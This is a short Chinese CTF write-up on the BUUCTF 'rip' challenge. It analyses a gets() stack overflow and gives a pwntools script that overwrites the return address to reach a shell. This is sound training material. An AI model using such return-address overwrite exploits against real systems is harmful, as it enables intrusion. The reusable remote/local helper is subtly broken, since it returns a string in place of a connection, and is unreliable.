。RIP

Exp模板：

from pwn import*
context(os='linux', arch='amd64', log_level='debug')
elf = ELF('./XXXX')
def remote_or_local(a):#用于选择打远程还是本地
    if a == 1:
        ip = str(raw_input('[+]please input ip:'))
        port = str(raw_input('[+]please input port:'))
        return  "remote"+"('"+ip+"'"+","+"port"+")"
    elif a == 0:
       return  elf.process()
sh=remote_or_local(a = 0)

RIP

考点：栈溢出

分析：

1、保护机制：

pwn@47d5989ab5ff ~/Pwn/Buu/rip  checksec pwn1
[*] '/home/pwn/Pwn/Buu/rip/pwn1'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX disabled
    PIE:      No PIE (0x400000)
    RWX:      Has RWX segments

2、程序信息：

DECIMAL       HEXADECIMAL     DESCRIPTION
--------------------------------------------------------------------------------
0             0x0             ELF, 64-bit LSB executable, AMD x86-64, version 1 (SYSV)

3、代码审计：

1、

main()
int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s[15]; // [rsp+1h] [rbp-Fh] BYREF #定义了一个字符串类型的数组s

  puts("please input");
  gets(s, argv);#gets函数传参
  puts(s);
  puts("ok,bye!!!");
  return 0;
}

4、思路：

简单的栈溢出，利用gets()函数的特性填充数据覆盖掉返回地址即可

5、动态调试：

6、EXP构造：（python2）

# -*- coding: UTF-8 -*-
#by 小渔xiaoyu
from pwn import*
context(os='linux', arch='amd64', log_level='debug')
elf = ELF('./pwn1')
def remote_or_local(a):
    if a == 1:
        ip = str(raw_input('[+]please input ip:'))
        port = str(raw_input('[+]please input port:'))
        return  "remote"+"('"+ip+"'"+","+"port"+")"
    elif a == 0:
       return  elf.process()
sh=remote_or_local(a = 0)
shell_addr  = 0x0401186
payload  = 'A'*(0xf+0x8)+p64(shell_addr)
sh.recvuntil('please input')
sh.sendline(payload)
sh.interactive()

文章内容如有问题欢迎各位师傅指正^^